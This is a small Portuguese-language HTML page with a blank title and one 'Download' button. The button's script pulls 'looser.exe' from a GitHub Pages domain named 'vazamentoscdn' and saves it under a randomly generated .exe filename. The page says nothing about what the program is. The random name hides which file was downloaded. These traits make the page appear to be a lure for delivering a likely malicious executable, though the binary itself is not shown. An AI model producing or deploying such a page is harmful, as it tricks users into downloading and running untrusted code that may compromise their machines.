<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title></title>
    <style>
        :root {
            --container-bg-color: rgba(128, 128, 128, 0.9);
            --button-color: #212121;
            --button-hover-color: #424242;
            --button-active-color: #616161;
        }

        body, html {
            height: 100%;
            margin: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            background: var(--main-bg-color);
            font-family: 'Arial', sans-serif;
        }

        .container {
            text-align: center;
            background: var(--container-bg-color);
            padding: 40px;
            border-radius: 15px;
            box-shadow: 0 0 20px rgba(0, 0, 0, 0.3);
        }

        .button {
            display: inline-block;
            padding: 15px 30px;
            font-size: 18px;
            font-weight: bold;
            cursor: pointer;
            color: #fff;
            background-color: var(--button-color);
            border: none;
            border-radius: 30px;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.2);
            transition: all 0.3s ease;
        }

        .button:hover {
            background-color: var(--button-hover-color);
            transform: scale(1.05);
        }

        .button:active {
            background-color: var(--button-active-color);
            box-shadow: 0 2px 4px rgba(0, 0, 0, 0.2);
            transform: scale(0.95);
        }
    </style>
</head>
<body>
    <div class="container">
        <button class="button" onclick="downloadFile()">Download</button>
    </div>
    <script>
        function downloadFile() {
            const link = document.createElement("a");
            link.href = "https://vazamentoscdn.github.io/cdn/looser.exe"; // Substitua pelo link correto do arquivo .exe
            
            // Gera um nome de arquivo aleatório
            const randomName = Math.random().toString(36).substring(2, 15) + ".exe";
            link.download = randomName;

            document.body.appendChild(link);
            link.click();
            document.body.removeChild(link);
        }
    </script>
</body>
</html>
